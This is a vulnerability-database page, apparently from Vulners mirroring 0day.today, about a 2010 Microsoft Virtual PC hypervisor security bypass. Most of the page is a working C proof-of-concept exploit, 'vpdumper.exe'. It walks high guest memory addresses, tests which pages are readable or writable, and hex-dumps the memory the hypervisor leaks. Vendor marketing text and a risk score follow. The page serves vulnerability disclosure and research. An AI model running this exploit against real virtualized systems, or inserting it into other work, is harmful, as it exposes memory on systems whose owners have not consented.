Vulners
Lucene search
Microsoft Virtual PC Hypervisor Virtual Machine Bypass Vulnerability
=====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================
Vulnerable: Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0
#include <windows.h>
#include <stdio.h>
#include <ctype.h>
#define ROWS 16
void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );
int main ( void )
{
/* message for users */
printf ( "n*********** vpdumper.exe ***********" );
printf ( "nCreated by Nicolas A. Economou ( [email protected] )" );
printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" );
/* Search and Print leaked memory */
printf ( "nsearching leaked memoryn" );
find_leaked_memory ();
return ( 1 );
}
void find_leaked_memory ( void )
{
char buffer [ 0x1000 ];
char *base;
int r, w;
/* search the high address memory area */
for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
{
/* Dark Area */
if ( ( unsigned int ) base == 0xe839c000 )
{
continue;
}
/* Inicialize flags */
r = FALSE;
w = FALSE;
/* check readable */
if ( IsBadReadPtr ( base , 1 ) == FALSE )
{
/* set flag */
r = TRUE;
}
/* check writeable */
if ( IsBadWritePtr ( base , 1 ) == FALSE )
{
/* set flag */
w = TRUE;
}
/* if readable or writeable */
if ( r == TRUE || w == TRUE )
{
/* get contents into our buffer */
memcpy ( buffer , base , 0x1000 );
/* print page attributes */
printf ( "attributes: " );
printf ( "%s" , ( r == TRUE ) ? "R":"" );
printf ( "%s" , ( w == TRUE ) ? "W":"" );
printf ( "n" );
/* print the memory */
print_data ( ( unsigned int ) base , buffer , 0x1000 );
}
}
}
void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
unsigned int cont;
unsigned int i;
/* Imprimo las lineas encontradas */
for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
{
/* Imprimo la direccion de la memoria */
printf ( "%.8x | " , direccion );
/* Incremento la direccion a mostrar */
direccion = direccion + ROWS;
/* Imprimo en hexa */
for ( i = 0 ; i < ROWS ; i ++ )
{
/* Imprimo la cantidad que pedi */
if ( i < ( bytes_a_imprimir - cont ) )
{
printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
}
else
{
printf ( " " );
}
}
/* Espacio entre las 2 columnas */
printf ( "| " );
/* Imprimo en caracteres */
for ( i = 0 ; i < ROWS ; i ++ )
{
if ( i < ( bytes_a_imprimir - cont ) )
{
printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
}
else
{
printf ( " " );
}
}
/* Fin de linea */
printf ( "n" );
}
}
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8